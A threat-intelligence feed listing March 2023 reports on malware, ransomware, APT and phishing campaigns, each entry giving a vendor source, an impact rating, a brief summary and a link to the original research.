Intel Name:: Observed_Exploitation_of_Adobe_ColdFusion

Date of Scan:: 2023-03-22

Impact:: LOW

Summary:: Rapid7’s Threat Intell team has observed active exploitation of Adobe ColdFusion in multiple customer environments.

Source: https://www.rapid7.com/blog/post/2023/03/21/etr-rapid7-observed-exploitation-of-adobe-coldfusion/

Intel Source:: ASEC

Intel Name:: New_ShellBot_DDoS_Malware_Targeting_Poorly_Managed_Linux_Servers

Date of Scan:: 2023-03-22

Impact:: LOW

Summary:: ASEC researchers have observed that poorly managed Linux SSH servers are being targeted as part of a new campaign that deploys different variants of malware called ShellBot. ShellBot, also known as PerlBot, is a DDoS Bot malware developed in Perl and characteristically uses IRC protocol to communicate with the C&C server.

Source: https://asec.ahnlab.com/en/49769/

Intel Source:: CrowdStrike

Intel Name:: Microsoft_OneNote_Attachments_used_by_QakBot_eCrime_Campaign

Date of Scan:: 2023-03-22

Impact:: LOW

Summary:: https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/

Source: https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/

Intel Source:: IBM Security Intelligence

Intel Name:: The_Analysis_of_FudModule_within_the_Lazarus

Date of Scan:: 2023-03-21

Impact:: LOW

Summary:: Researchers from IBM Security Intelligence have analyzed the FudModule within the Lazarus sample, as well as highlighted a strategy of using telemetry stream health as a mode of detecting malware designed to impair defenses through ETW tampering.

Source: https://securityintelligence.com/posts/defensive-considerations-lazarus-fudmodule/

Intel Source:: Securelist

Intel Name:: A_New_APT_Discovered_in_the_Area_of_Russo_Ukrainian_Conflict

Date of Scan:: 2023-03-21

Impact:: LOW

Summary:: Securelist researchers have identified a new APT group but yet not found any direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and the investigation continues.

Source: https://securelist.com/bad-magic-apt/109087/

Intel Source:: JFrog

Intel Name:: Hackers_targeting_DotNET_Developers_With_Malicious_NuGet_Packages

Date of Scan:: 2023-03-21

Impact:: LOW

Summary:: Researchers from JFrog have identified that threat actors are targeting and infecting .NET developers with cryptocurrency stealers delivered through the NuGet repository and impersonating multiple legitimate packages via typosquatting.

Source: https://jfrog.com/blog/attackers-are-starting-to-target-net-developers-with-malicious-code-nuget-packages/

Intel Source:: Checkpoint

Intel Name:: In_depth_Analysis_of_DotRunpeX_Injector

Date of Scan:: 2023-03-20

Impact:: LOW

Summary:: Researchers from Checkpoint have analyzed the dotRunpeX injector and its relation to the older version and the Investigation shows that dotRunpeX is used in the wild to deliver numerous known malware families.

Source: https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/

Intel Source:: Redacted

Intel Name:: BIanLian_Ransomware_Gang_Turns_to_Data_Extortion

Date of Scan:: 2023-03-20

Impact:: LOW

Summary:: Redacted researchers have identified the BianLian ransomware group has shifted its focus from encrypting its victims' files to only exfiltrating data found on compromised networks and using them for extortion.

Source: https://redacted.com/blog/bianlian-ransomware-gang-continues-to-evolve/

Intel Source:: WithSecure

Intel Name:: Hackers_From_China_and_Russia_using_SILKLOADER_Malware_to_Avoid_Detection

Date of Scan:: 2023-03-20

Impact:: LOW

Summary:: Researchers from WithSecure Labs have investigated and found an interesting Cobalt Strike beacon loader that leverages DLL side-loading, which they are tracking as SILKLOADER. By taking a closer look at the loader, it is identified several activity clusters leveraging this loader within the Russian as well as Chinese cybercriminal ecosystems.

Source: https://labs.withsecure.com/content/dam/labs/docs/withsecure-silkloader.pdf

Intel Source:: Akamai

Intel Name:: Diving_Deep_into_Go_Based_Threat

Date of Scan:: 2023-03-20

Impact:: LOW

Summary:: Researchers from Akamai have discovered a new botnet named HinataBot at the start of the year, they caught it on their HTTP and SSH honeypots and saw exploiting old flaws such as CVE-2014-8361 and CVE-2017-17215.

Source: https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet

Intel Source:: Mandiant

Intel Name:: Chinese_Hackers_Suspected_of_Launching_Fortinet_Zero_day_Attacks

Date of Scan:: 2023-03-20

Impact:: MEDIUM

Summary:: Mandiant researchers have discovered that a suspected Chinese hacking group has been linked to a series of attacks on government organizations exploiting a Fortinet zero-day vulnerability (CVE-2022-41328) to deploy malware.

Source: https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

Intel Source:: Uptycs

Intel Name:: A_New_InfoStealer_Named_HookSpoofer

Date of Scan:: 2023-03-20

Impact:: LOW

Summary:: Uptycs researchers have discovered a new Infostealer with keylogging and clipper capabilities named HookSpoofer spreading by multiple bundlers. A bundler is a collection of two or more files combined together in a single package.

Source: https://www.uptycs.com/blog/threat-research-hookspoofer

Intel Source:: Sophos

Intel Name:: The_Popularity_of_ProxyNotShell_Continues_to_Grow

Date of Scan:: 2023-03-18

Impact:: LOW

Summary:: Researchers from Sophos have observed that ProxyNotShell vulnerability continues to make waves as November 2022 fixes fail to contain the SSRF tactic.

Source: https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exchange-exploitation-still/

Intel Source:: G Data Blog

Intel Name:: ChatGPT_Rising_Activities_in_Cybercrime_World

Date of Scan:: 2023-03-18

Impact:: MEDIUM

Summary:: Researchers from G DATA have observed that cyberthreat actors capitalize on prominent social events' latest technology buzzwords to launch their attacks. And the curtain raiser for 2023 that made the headlines was the clamor and viral use of a very human-sounding, artificial technology chatbot named, ChatGPT.

Source: https://www.gdatasoftware.com/blog/2023/03/37716-chatgpt-evil-twin

Intel Source:: Sentinelone

Intel Name:: The_Investigation_of_Winter_Vivern_APT_Activity

Date of Scan:: 2023-03-18

Impact:: LOW

Summary:: SentinelOne researchers have analyzed Winter Vivern Advanced Persistent Threat (APT) activity, leveraging observations made by The Polish CBZC and Ukraine CERT and uncovered a previously unknown set of espionage campaigns and targeting activities conducted by this threat actor.

Source: https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/

Intel Source:: Lab52

Intel Name:: APT_C_36_Linked_With_Campaigns

Date of Scan:: 2023-03-18

Impact:: LOW

Summary:: Researchers from Lab52 have observed the APT-C-36 group has many similarities in terms of tactics, techniques, and procedures (TTPs) with the group Hagga / Aggah.

Source: https://lab52.io/blog/apt-c-36-from-njrat-to-apt-c-36/

Intel Source:: Talos

Intel Name:: Hackers_From_YoroTrooper_Group_Targeting_CIS_Energy_Orgs_and_EU_Embassies

Date of Scan:: 2023-03-17

Impact:: MEDIUM

Summary:: Cisco Talos researchers have identified a new threat actor named 'YoroTrooper' has been running cyber-espionage campaigns since at least June 2022, targeting government and energy organizations in Commonwealth of Independent States (CIS) countries.

Source: https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/

Intel Source:: Cyble

Intel Name:: The_MedusaLocker_Ransomware_is_Revealed

Date of Scan:: 2023-03-16

Impact:: LOW

Summary:: Researchers from Cyble have unmasked the MedusaLocker ransomware. It's known to target Hospital and Healthcare industries, but additionally, the gang also targets industries such as Education and Government organizations.

Source: https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/

Intel Source:: Blackberry

Intel Name:: Russian_Threat_Group_NOBELIUM_Targeting_Western_Countries

Date of Scan:: 2023-03-16

Impact:: MEDIUM

Summary:: Researchers from Blackberry have observed a new campaign targeting European Union countries, specifically, its diplomatic entities and systems transmitting sensitive information about the region's politics, aiding Ukrainian citizens fleeing the country, and providing help to the government of Ukraine.

Source: https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine

Intel Source:: Cyble

Intel Name:: Hackers_Exploiting_SVB_Collapse_Scenario

Date of Scan:: 2023-03-16

Impact:: LOW

Summary:: Cyble researchers have identified several suspicious websites that have emerged in the wake of the Silicon Valley Bank (SVB) collapse.

Source: https://blog.cyble.com/2023/03/14/svb-collapse-triggers-heightened-cybersecurity-concerns/

Intel Source:: Juniper

Intel Name:: A_Look_at_Dark_Side_of_Email_Traffic

Date of Scan:: 2023-03-16

Impact:: LOW

Summary:: Researchers from Juniper have analyzed the dark side of email traffic, uncovering some of the latest malware threats, tactics, and trends that can potentially undermine the systems.

Source: https://blogs.juniper.net/en-us/threat-research/uncovering-the-dark-side-of-email-traffic

Intel Source:: Fortinet

Intel Name:: The_Examination_of_FG_IR_22_369

Date of Scan:: 2023-03-16

Impact:: HIGH

Summary:: FortiGate researchers have identified that government entities and large organizations are targeted by an unknown threat actor by exploiting a security flaw in Fortinet FortiOS software to result in data loss and OS and file corruption.

Source: https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis

Intel Source:: Welivesecurity

Intel Name:: APT_Group_Tick_Targeting_Data_Loss_Prevention_Company

Date of Scan:: 2023-03-16

Impact:: MEDIUM

Summary:: ESET researchers have discovered a campaign by APT group Tick. The attackers compromising the DLP company’s internal update servers to deliver malware inside the software developer’s network, and trojanizing installers of legitimate tools using by the company, which eventually result in the execution of malware on the computers of the company’s customers.

Source: https://www.welivesecurity.com/2023/03/14/slow-ticking-time-bomb-tick-apt-group-dlp-software-developer-east-asia/

Intel Source:: CISA

Intel Name:: Telerik_Vulnerability_in_US_Government_IIS_Server

Date of Scan:: 2023-03-16

Impact:: MEDIUM

Summary:: The CISA, FBI, and MS-ISAC released a joint Cybersecurity Advisory. This joint CSA provides IT infrastructure defenders with TTPs, IOCs, and detection, protection methods against similar, successful CVE-2019-18935 exploitation.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories?search_api_fulltext=&sort_by=field_release_date&page=1

Intel Source:: Microsoft

Intel Name:: Large_Scale_Phishing_Campaigns_are_Powered_by_DEV_1101_AiTM_Phishing_Kit

Date of Scan:: 2023-03-16

Impact:: MEDIUM

Summary:: Researchers from Microsoft have identified an open-source adversary-in-the-middle (AiTM) phishing kit that has found a number of takers in the cybercrime world for its ability to orchestrate attacks at scale. It is tracking the threat actor behind the development of the kit under its emerging moniker DEV-1101.

Source: https://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/

Intel Source:: ASEC

Intel Name:: Mallox_Ransomware_Distributing_in_Korea

Date of Scan:: 2023-03-16

Impact:: LOW

Summary:: ASEC researchers have discovered the distribution of the Mallox ransomware which targets vulnerable MS-SQL servers.

Source: https://asec.ahnlab.com/en/49366/

Intel Source:: Google Blog

Intel Name:: Microsoft_SmartScreen_Bypassed_by_Magniber_Ransomware_Actors

Date of Scan:: 2023-03-16

Impact:: LOW

Summary:: Researchers from Google threat analysis group have discovered the usage of an unpatched security bypass in Microsoft’s SmartScreen security feature, which financially motivated actors are using to deliver the Magniber ransomware without any security warnings. The attackers are delivering MSI files signed with an invalid but specially crafted Authenticode signature.

Source: https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/

Intel Source:: Sentinelone

Intel Name:: Diving_Deep_into_CatB_Ransomware

Date of Scan:: 2023-03-16

Impact:: LOW

Summary:: SentinelOne researchers have analyzed the CatB ransomware and its abuse of the legitimate MSDTC service, describing its evasion tactics, encryption behavior, and its attempts to steal credentials and browser data.

Source: https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/

Intel Source:: Mandiant

Intel Name:: North_Korea_s_UNC2970_TTPs_Part_1_and_2

Date of Scan:: 2023-03-15

Impact:: MEDIUM

Summary:: During our investigation, Mandiant researchers discovered most of the original compromised hosts, targeted by UNC2970. Mandiant Managed Defense discovered as well that this group is targeting a U.S.-based technology company

Source: https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970 https://www.mandiant.com/resources/blog/lightshift-and-lightshow

Intel Source:: ASEC

Intel Name:: A_CHM_malware_by_the_Kimsuky_group

Date of Scan:: 2023-03-15

Impact:: LOW

Summary:: ASEC has discovered a new CHM malware created by the Kimsuky group. This malware type is the same that the reserqachers mnetioned earlier in their posts on the malware distributed by the Kimsuky group, its goal being the exfiltration of user information.

Source: https://asec.ahnlab.com/en/49295/

Intel Source:: Netscope

Intel Name:: Increasingly_Abusing_of_DigitalOcean_by_attackers

Date of Scan:: 2023-03-15

Impact:: LOW

Summary:: Netskope Threat Labs observed increased traffic in malicious web pages hosted on DigitalOcean in the last couple months. This new campaigns scam mimics Windows Defender and tries to deceive users into believing that their computer is infected. The purpose of this scam is to involve victims into a scam “help line”. The attackers try to involve the remotely access of the victim’s computer to either install malware or request payment to infect the victims.

Source: https://www.netskope.com/blog/attackers-increasingly-abusing-digitalocean-to-host-scams-and-phishing

Intel Source:: MetaBase Q

Intel Name:: The_new_ATM_Malware_FiXS

Date of Scan:: 2023-03-14

Impact:: LOW

Summary:: FiXs is a new ATM malware that steals data from ATMs and infects computers. Metabase Q has been tracking and monitoring the rise of ATM malware that takes advantage of physical and digital components of the ATM.

Source: https://www.metabaseq.com/fixs-atms-malware/

Intel Source:: Talos

Intel Name:: New_capabilities_of_Prometei_botnet

Date of Scan:: 2023-03-14

Impact:: MEDIUM

Summary:: Researchers from Talos have observed Prometei with the updated infrastructure components and capabilities. The botnet operators updated certain submodules of the execution chain to automate processes and challenge forensic analysis methods. The threat actors are trying actively spreading improved Linux versions of the Prometei bot, v3. Also researchers have observed a new functionality, which includes an additional C2 domain generating algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache Webserver with a web shell. This bot is possible influenced by the war in Ukraine.

Source: https://blog.talosintelligence.com/prometei-botnet-improves/

Intel Source:: Cofense

Intel Name:: Emotet_resumes_sending_malicious_emails

Date of Scan:: 2023-03-14

Impact:: LOW

Summary:: Researchers from Confense have discovered that after several months of inactivity, the Emotet botnet resumed email activity this morning at 8:00am EST. The malicious emails seem to be replying to already existing email chains, with the addition of an attached .zip file. The .zip files are not password protected. The themes of the attached files include finances and invoices.

Source: https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/

Intel Source:: ISC.SANS

Intel Name:: AsynRAT_Trojan_Distributing_via_Bill_Payment_Email

Date of Scan:: 2023-03-13

Impact:: LOW

Summary:: Researchers from SANS have observed the mail server quarantined this file FautraPago392023.gz. After executing (gunzip) the file, there was no .exe extension associated with this file. The source and destination addresses are both blank without an actual email address.

Source: https://isc.sans.edu/diary/AsynRAT+Trojan+Bill+Payment+Pago+de+la+factura/29626/

Intel Source:: ASEC

Intel Name:: Netcat_Malware_Targeting_MS_SQL_Servers

Date of Scan:: 2023-03-13

Impact:: LOW

Summary:: Researchers from ASEC have discovered the distribution of the Netcat malware targeting poorly managed MS-SQL servers. Netcat is a utility that allows users to send and receive data from specific destinations on a network connected by the TCP/UDP protocol.

Source: https://asec.ahnlab.com/en/49249/

Intel Source:: PaloAlto

Intel Name:: New_GoBruteforcer_Malware_Targeting_phpMyAdmin_MySQL_FTP_and_Postgres

Date of Scan:: 2023-03-13

Impact:: MEDIUM

Summary:: PaloAlto researchers have identified a newly discovered Golang-based botnet malware scan for and infect web servers running phpMyAdmin, MySQL, FTP, and Postgres services.

Source: https://unit42.paloaltonetworks.com/gobruteforcer-golang-botnet/?web_view=true

Intel Source:: ISC.SANS

Intel Name:: Overview_of_a_Mirai_Payload_Generator

Date of Scan:: 2023-03-13

Impact:: LOW

Summary:: Researchers from SANS have observed that still honeypot is hit by hundreds of Mirai requests every day. Upon analysis, they found a Python script that generates a Mirai payload and deploys networking services to serve it via FTP, HTTP, and TFTP.

Source: https://isc.sans.edu/diary/Overview+of+a+Mirai+Payload+Generator/29624/

Intel Source:: Cofense

Intel Name:: New_Phishing_Scam_Using_Fake_SBA_Grants

Date of Scan:: 2023-03-13

Impact:: LOW

Summary:: Researchers from Cofense have observed that a phishing campaign attempting to impersonate the US Small Business Administration (SBA), offering these grants in the hopes someone unfortunate will provide their credentials.

Source: https://cofense.com/blog/fake-small-business-administration-sba-grant-used-in-new-phishing-scam/

Intel Source:: Mandiant

Intel Name:: Chinese_Hacker_Running_Malware_on_Unpatched_SMA

Date of Scan:: 2023-03-13

Impact:: LOW

Summary:: Mandiant researchers have identified a suspected Chinese campaign that involves maintaining long-term persistence by running malware on an unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has the functionality to steal user credentials, provide shell access, and persist through firmware upgrades. Currently tracks this actor as UNC4540.

Source: https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall

Intel Source:: Esentire

Intel Name:: BATLOADER_Malware_Leveraging_Google_Ads

Date of Scan:: 2023-03-13

Impact:: MEDIUM

Summary:: Esentire researchers have discovered the malware downloader known as BATLOADER that is abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. The malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAPI's ChatGPT, Spotify, Tableau, and Zoom.

Source: https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif

Intel Source:: ASEC

Intel Name:: PlugX_Malware_Exploits_Remote_Desktop_Software_Flaws

Date of Scan:: 2023-03-11

Impact:: MEDIUM

Summary:: Researchers from ASEC have discovered security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware.

Source: https://asec.ahnlab.com/en/49097/

Intel Source:: Cyble

Intel Name:: Chaos_Ransomware_Shadow_is_Cast_by_BlackSnake_Ransomware

Date of Scan:: 2023-03-11

Impact:: LOW

Summary:: Cyble Labs researchers have discovered a ransomware variant that not only encrypts victims' files but also steals their Discord tokens.

Source: https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/

Intel Source:: Fortinet

Intel Name:: New_ScrubCrypt_Crypter_Targeting_Oracle_WebLogic

Date of Scan:: 2023-03-10

Impact:: MEDIUM

Summary:: Fortinet Lab researchers have observed the attack chain commences with the successful exploitation of susceptible Oracle WebLogic servers to download a PowerShell script that contains ScrubCrypt.

Source: https://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt

Intel Source:: Securelist

Intel Name:: The_Use_of_Search_Engines_For_Malvertising

Date of Scan:: 2023-03-10

Impact:: LOW

Summary:: Researchers from Securelist have observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, are abusing the search engine promotion plan in order to deliver malicious payloads to victims’ machines.

Source: https://securelist.com/malvertising-through-search-engines/108996/

Intel Source:: Sentinelone

Intel Name:: IceFire_Ransomware_Exploiting_IBM_Aspera_Faspex

Date of Scan:: 2023-03-10

Impact:: MEDIUM

Summary:: SentinelOne researchers have identified a Windows-based ransomware strain known as IceFire has expanded its focus to target Linux enterprise networks belonging to several media and entertainment sector organizations across the world.

Source: https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/

Intel Source:: Cofense

Intel Name:: Increasing_Phishing_Campaigns_During_Tax_Season

Date of Scan:: 2023-03-09

Impact:: LOW

Summary:: Researchers from Cofense have identified threat actors attempting to use tax season to target recipients with a potential refund and using the Adobe filesharing service to deliver the phishing.

Source: https://cofense.com/blog/tax-season-phishing-campaigns-are-ramping-up/

Intel Source:: Volexity

Intel Name:: Analysis_of_Memory_For_Detecting_EDR_Nullifying_Malware

Date of Scan:: 2023-03-09

Impact:: LOW

Summary:: Volexity researchers have examined the technique of attacking endpoint detection and response (EDR) and antivirus (AV) software could reliably be detected through memory analysis.

Source: https://www.volexity.com/blog/2023/03/07/using-memory-analysis-to-detect-edr-nullifying-malware/

Intel Source:: ZScaler

Intel Name:: Analysis_of_Nevada_Ransomware_and_Compares_With_Nokoyawa_Ransomware

Date of Scan:: 2023-03-09

Impact:: LOW

Summary:: Zscaler ThreatLab have identified the significant code similarities between Nevada and Nokoyawa ransomware including debug strings, command-line arguments, and encryption algorithms.

Source: https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant

Intel Source:: Trustwave

Intel Name:: OneNote_Misused_by_Cybercriminals

Date of Scan:: 2023-03-09

Impact:: LOW

Summary:: Researchers from Trustwave have analyzed the activity of cybercriminals as to how they are abusing OneNote.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-1/ https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-noteworthy-threat-how-cybercriminals-are-abusing-onenote-part-2/

Intel Source:: Cyware

Intel Name:: PyPI_package_delivers_malicious_Colour_Blind_RAT

Date of Scan:: 2023-03-08

Impact:: LOW

Summary:: Researchers from cyware have identified a malicious PyPI package that delivers a fully-featured information stealer and remote access trojan dubbed Colour-Blind.

Source: https://cyware.com/news/malicious-pypi-package-delivers-colour-blind-rat-1c24f4e6/?web_view=true

Intel Source:: ASEC

Intel Name:: GlobeImposter_Ransomware_Installed_Using_RDP

Date of Scan:: 2023-03-08

Impact:: LOW

Summary:: ASEC has recently discovered the active distribution of the GlobeImposter ransomware. This attack is being carried out by the threat actors behind MedusaLocker.

Source: https://asec.ahnlab.com/en/48940/

Intel Source:: Fortinet

Intel Name:: In_Depth_Analysis_of_Sirattacker_and_ALC_Ransomware

Date of Scan:: 2023-03-08

Impact:: MEDIUM

Summary:: FortiGate Lab researchers have gathered data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. They analyzed the Sirattacker and ALC ransomware which is targeting Microsoft Windows users.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-sirattacker-acl?&web_view=true

Intel Source:: Trellix

Intel Name:: Qakbot_evolves_to_OneNote_Malware_Distribution

Date of Scan:: 2023-03-08

Impact:: MEDIUM

Summary:: Researchers from Trellix have discovered Qakbot (aka QBot, QuakBot, and Pinkslipbot) is a sophisticated piece of malware, there has been an upsurge in the number of Qakbot campaigns using a novel delivery technique: OneNote documents for malware distribution

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html

Intel Source:: Checkpoint

Intel Name:: Chinese_Cyber_Attack_Against_Southeast_Asian_Government_Entities

Date of Scan:: 2023-03-08

Impact:: HIGH

Summary:: Researchers from Checkpoint have analyzed the TTPs and the tools used in the espionage campaign against Southeast Asian government entities. The initial infection stages of this campaign use TTPs and tools consistent with Sharp Panda activity.

Source: https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/

Intel Source:: PaloAlto

Intel Name:: LokiBot_Distributing_via_Phishing_Emails

Date of Scan:: 2023-03-07

Impact:: LOW

Summary:: PaloAlto researchers have uncovered a malware distribution campaign that is delivering the LokiBot information stealer via business email compromise (BEC) phishing emails. This malware is designed to steal sensitive information from victims' systems, such as passwords and banking information, as well as other sensitive data.

Source: https://unit42.paloaltonetworks.com/lokibot-spike-analysis/

Intel Source:: Lumen

Intel Name:: New_HiatusRAT_Malware_Targeting_Business_Grade_Routers

Date of Scan:: 2023-03-07

Impact:: MEDIUM

Summary:: Lumen researchers have observed malware that is targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America at least since July 2022.

Source: https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/

Intel Source:: Trellix

Intel Name:: Phishing_Campaign_Targeting_Job_Seekers_and_Employers

Date of Scan:: 2023-03-07

Impact:: LOW

Summary:: Researchers from Trellix have discovered threat actors are exploiting the ongoing economic downturn by using job-themed phishing and malware campaigns to target job seekers and employers to steal sensitive information and hack company recruiters.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/cybercrime-takes-advantage-of-2023-recession-with-job-themed-scams.html

Intel Source:: Nviso

Intel Name:: OneNote_Embedded_File_Abuse

Date of Scan:: 2023-03-07

Impact:: LOW

Summary:: Researchers from Nviso have observed the OneNote feature that is being abused during these phishing campaigns is hiding embedded files behind pictures which entices the user to click the picture. If the picture is clicked, it will execute the file hidden beneath.

Source: https://blog.nviso.eu/2023/02/27/onenote-embedded-file-abuse/

Intel Source:: Bitdefender

Intel Name:: Phishing_Campaign_Using_Copycat_ChatGPT_Platform

Date of Scan:: 2023-03-07

Impact:: MEDIUM

Summary:: Researchers from BitDefender Labs have identified the success of the viral AI tool has also attracted the attention of fraudsters who use the technology to conduct highly sophisticated investment scams against unwary internet users.

Source: https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-warns-of-fresh-phishing-campaign-that-uses-copycat-chatgpt-platform-to-swindle-eager-investors/

Intel Source:: PRODAFT

Intel Name:: In_Depth_Analysis_of_RIG_Exploit_Kit

Date of Scan:: 2023-03-07

Impact:: LOW

Summary:: Researchers from Prodaft have analyzed the RIG Exploit Kit. It is malware being operated as a MaaS subscription model and is enjoying the most glorious duration of its lifetime in terms of successful attacks.

Source: https://www.prodaft.com/resource/detail/rig-rig-exploit-kit-depth-analysis

Intel Source:: ASEC

Intel Name:: The_Analysis_of_Lazarus_Group

Date of Scan:: 2023-03-07

Impact:: LOW

Summary:: ASEC researchers have identified that Lazarus group’s malware strains have been found in various Korean companies related to national defense, satellites, software, media press, etc. Hence, they pursued and analyzed the Lazarus threat group’s activities and related malware.

Source: https://asec.ahnlab.com/en/48810/

Intel Source:: TrendMicro

Intel Name:: Spear_Phishing_Campaign_Targeting_Hospitality_Industry_Using_RedLine_Stealer

Date of Scan:: 2023-03-06

Impact:: LOW

Summary:: Researchers from TrendMicro have identified RedLine Stealer’s evasive spear-phishing campaign that targeting the hospitality industry.

Source: https://www.trendmicro.com/en_us/research/23/c/managed-xdr-exposes-spear-phishing-campaign-targeting-hospitalit.html

Intel Source:: Cyble

Intel Name:: LockBit_Ransomware_Attack_on_Indian_Companies

Date of Scan:: 2023-03-06

Impact:: LOW

Summary:: Cyble researchers have observed the LockBit ransomware group that claimed to have compromised the networks of an Indian investment company, Infrastructure Leasing & Financial Services Limited (IL&FS), on February 28, 2023.

Source: https://blog.cyble.com/2023/03/01/ransomware-attack-on-ilfs/

Intel Source:: Malwarebytes

Intel Name:: RIG_Exploit_Kit_Targeting_Internet_Explorer_Users

Date of Scan:: 2023-03-06

Impact:: LOW

Summary:: Malwarebytes researchers have identified that Internet Explorer (IE) is still being exploited by exploit kits like the RIG exploit kit (EK).

Source: https://www.malwarebytes.com/blog/news/2023/03/internet-explorer-users-still-targeted-by-rig-exploit-kit

Intel Source:: Cyble

Intel Name:: WhiteSnake_Stealer_Targeting_Windows_and_Linux_Users

Date of Scan:: 2023-03-06

Impact:: LOW

Summary:: Cyble researchers have discovered a new malware strain called “WhiteSnake” Stealer. This stealer is available in versions designed for both Windows and Linux. It is capable of gathering a range of sensitive information, including passwords, cookies, credit card numbers, screenshots, and other personal or financial data.

Source: https://blog.cyble.com/2023/02/24/new-whitesnake-stealer-offered-for-sale-via-maas-model/

Intel Source:: Fortinet

Intel Name:: MyDoom_Worm_Distributing_via_Phishing_Email

Date of Scan:: 2023-03-06

Impact:: LOW

Summary:: Researchers from Fortinet have identified a phishing campaign using the MyDoom worm. It was first discovered back in 2004 and it has seen some updates and modifications since its introduction.

Source: https://www.fortinet.com/blog/threat-research/just-because-its-old-doesnt-mean-you-throw-it-away-including-malware

Intel Source:: Welivesecurity

Intel Name:: Hackers_From_China_Using_Custom_Backdoor_to_Evade_Detection

Date of Scan:: 2023-03-06

Impact:: LOW

Summary:: Researchers from Welivesecurity have identified the Chinese cyber espionage hacking group Mustang Panda is deploying a new custom backdoor named 'MQsTTang' in attacks starting this year.

Source: https://www.welivesecurity.com/2023/03/02/mqsttang-mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/

Intel Source:: Sysdig

Intel Name:: Hackers_From_SCARLETEEL_Using_Advanced_Cloud_Skills_to_Steal_Source_Code_and_Data

Date of Scan:: 2023-03-06

Impact:: MEDIUM

Summary:: Sysdig researchers have discovered a sophisticated cloud operation in a customer environment, dubbed SCARLETEEL, that resulted in stolen proprietary data. The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials.

Source: https://sysdig.com/blog/cloud-breach-terraform-data-theft/

Intel Source:: ZScaler

Intel Name:: OneNote_Documents_Distributing_Malware

Date of Scan:: 2023-03-06

Impact:: LOW

Summary:: Zscaler researchers have observed threat actors are increasingly using Microsoft OneNote documents to deliver malware via phishing emails.

Source: https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

Intel Source:: CISA

Intel Name:: The_New_TTPs_of_Royal_ransomware

Date of Scan:: 2023-03-06

Impact:: MEDIUM

Summary:: The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released the joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

Intel Source:: Cyfirma

Intel Name:: The_Examination_of_EXFILTRATION_22

Date of Scan:: 2023-03-04

Impact:: LOW

Summary:: Researchers from Cyfirma have provided an analysis of a new post of exploitation framework called EXFILTRATOR-22 a.k.a. EX-22.

Source: https://www.cyfirma.com/outofband/exfiltrator-22-an-emerging-post-exploitation-framework/

Intel Source:: Fortinet

Intel Name:: The_Deep_Investigation_of_LockBit_Ransomware_Campaign

Date of Scan:: 2023-03-04

Impact:: MEDIUM

Summary:: FortiGuard Labs researchers have observed a new LockBit ransomware campaign last December and January using a combination of techniques effective against AV and EDR solutions and analyzed the infection chain and Tactics, Techniques, and Procedures (TTPs) of this campaign.

Source: https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign?&web_view=true

Intel Source:: Talos

Intel Name:: The_deployment_of_New_MortalKombat_Ransomware_and_Laplas_Clipper_Malware_threats

Date of Scan:: 2023-03-04

Impact:: MEDIUM

